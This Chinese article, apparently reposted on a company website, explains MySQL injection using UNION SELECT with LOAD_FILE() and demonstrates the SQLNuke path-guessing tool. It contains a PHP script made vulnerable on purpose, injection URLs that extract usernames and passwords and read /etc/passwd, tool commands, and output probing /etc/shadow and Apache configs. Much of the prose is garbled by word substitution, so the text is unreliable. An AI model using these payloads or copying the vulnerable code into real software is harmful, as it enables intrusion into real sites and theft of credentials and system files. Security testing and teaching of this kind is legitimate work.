|
|
|
联系客服020-83701501

简单而快速的MySQL注射LOAD_FILE() Fuzzer

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
冗杂而快捷的MySQL注射LOAD_FILE() Fuzzer

SQL注入中,有良多技术语句会和Union select 汇集把持,比方load_file()、 into outfile() 、informaction_schema、char()、cast()和limit.良多打击者平凡最经常使用到的是union语 句,informaction_schema和order by语句等。但是有良多取得计划帐号和密码的材干被疏忽了,就像下文讲的 一样:

http://localhost/sqlnuke.php?id=-1+union+select+1,concat(username,0x3a,password),3,4%20from%20accounts

本文中用到的sqlnuke.php文件代码下列:

Default
12345678910111213141516171819202122232425 <?php// Jay Turla made this script vulnerable on purpose :p$id = $_GET["id"];// Open a Connection to the MySQL Server$con = mysql_connect("localhost", "username", "password");if (!$con){ die('Could not connect to the MySQL Server ' . mysql_error());}//Set Databasemysql_select_db("database_name", $con);// SQL Query$sql= "SELECT * FROM table_name where id_number = $id";echo "<h2>I am Vulnerable to SQL Injection </h2><br /> ";$res = mysql_query($sql);while($row = mysql_fetch_array($res)){ echo "<strong>Username:</strong> " . $row['username'] . "<br />"; echo "<strong>Password:</strong> " . $row['password'] . "<br />"; echo "<strong>Signature:</strong> " . $row['mysignature'] . "<br />"; echo "<br />";}// Close a Connectionmysql_close($con);?>

在这篇文章中咱们会用到一个明朗测试新东西,叫SQLNuke,是一款mysql load_file()东西。

要把持此违抗,该文件必需要在主机办事器上,同时需要有该文件的完整途径,用户必须具备文件权限。该文件必须可读,大小必须小于max_allowed_packet(my.ini中设置)字节。若是文件不存在可能不克不及读取会前往NULL.

语法下列:

http://localhost/sqlnuke.php?id=1+union+select+1,load_file(‘file_name/path_name’),3,4

在这类情况下,打击者大概像使用外地文件搜罗裂痕一样,对网站发动入侵.假定咱们晓得了列数,即大概把持union select和load_file()组合发动入侵,比方搜集一些飞快文件音讯,像/etc/passwd,/etc/hosts,/etc /shadow等等。

Example:

http://localhost/sqlnuke.php?id=1+union+select+1,load_file(‘/etc/passwd’),3,4

sql注入load_file()工具

它需要损耗大量的时间来预想办事器上的文件,并且会前往出详细的途径。但是若是把持了sqlnuke,也许放慢预想速度,浪掷更多的时间。

SQLNuke是一款免费的开源mysql注射load_file()明朗测试东西,是用ruby措辞写的,把持起来特别冗杂不便。

SQLNuke安放和基础用法:

安放SqlNuke从前,需要确保安放了Git和Ruby,因为它是用ruby措辞写的,同时需要git号令来克隆SqlNuke库到外地。

git库址:https://github.com/nuke99/sqlnuke.git

若是不有安放git和ruby,把持的Debian刊行版,像ubuntu、backtrack、linux等,大概把持下列号令安放git和ruby。

sudo apt-get install git-core

sudo apt-get install ruby

要把持SQLNuke,进入它地点目录,把持./sql.rb发动它.

sql注入load_file()工具

假定咱们的目标是:http://localhost/sqlnuke.php?id=1+union+select+1,2,3,4?,用XxxX变迁掉2,何等它会覆盖load_file()函数,从而显示出文件途径.

root@bt:~/sqlnuke# ./sql.rb -u 'http://localhost/sqlnuke.php?id=1+union+select+1,XxxX,3,4'

[!] localhost folder already exists [!] No OS selected, Continue with all the possibilities [200] - [Success]????? /etc/passwd [200] - [Failed]????? /etc/shadow [200] - [Success]????? /etc/group [200] - [Success]????? /etc/hosts [200] - [Failed]????? /etc/apache2/logs/access.log [200] - [Failed]????? /etc/httpd/access.log [200] - [Failed]????? /etc/init.d/apache/httpd.conf [200] - [Failed]????? /etc/init.d/apache2/httpd.conf [200] - [Failed]????? /usr/local/apache2/conf/httpd.conf [200] - [Failed]????? /usr/local/apache/conf/httpd.conf [200] - [Failed]????? /home/apache/httpd.conf [200] - [Failed]????? /home/apache/conf/httpd.conf [200] - [Failed]????? /opt/apache/conf/httpd.conf [200] - [Failed]????? /etc/httpd/httpd.conf [200] - [Failed]????? /etc/httpd/conf/httpd.conf [200] - [Failed]????? /etc/apache/apache.conf [200] - [Failed]????? /etc/apache/httpd.conf [200] - [Success]????? /etc/apache2/apache2.conf [200] - [Success]????? /etc/apache2/httpd.conf [200] - [Success]????? /etc/apache2/sites-available/default [200] - [Failed]????? /etc/apache2/vhosts.d/default_vhost.include [200] - [Failed]????? /var/www/vhosts/sitename/httpdocs//etc/init.d/apache [200] - [Failed]????? C:/wamp/bin/apache/logs/access.log [200] - [Failed]????? C:/wamp/bin/mysql/mysql5.5.24/wampserver.conf [200] - [Failed]????? C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf [200] - [Failed]????? C:/wamp/bin/apache/apache2.2.22/conf/wampserver.conf [200] - [Failed]????? C:/wamp/bin/apache/apache2.2.22/conf/httpd.conf.build [+] Saved files are in 'output/localhost' 运行之后就能够看到详细的存在的文件途径,也许果断细碎典范等等。若是已经晓得是linux细碎,也大概指定明朗测试的细碎典范,从而浪掷更多的时间,号令下列: ./sql.rb – u ‘http://localhost/sqlnuke.phpid=1+union+select+1,XxxX,3,4′ –os linux sql注入load_file()工具 若是你需要猜解更多的文件,你大概定义SqlNuke目录下的packset.lst文件,来参加更多的文件途径音讯。 sql注入load_file()工具 ? link:http://www.nxadmin.com/tools/1149.html

 

本文由Internet安全攻防研究室(www.91ri.org)音讯安全小组收集整顿,转载请说明因由。

数安新闻+更多

证书相关+更多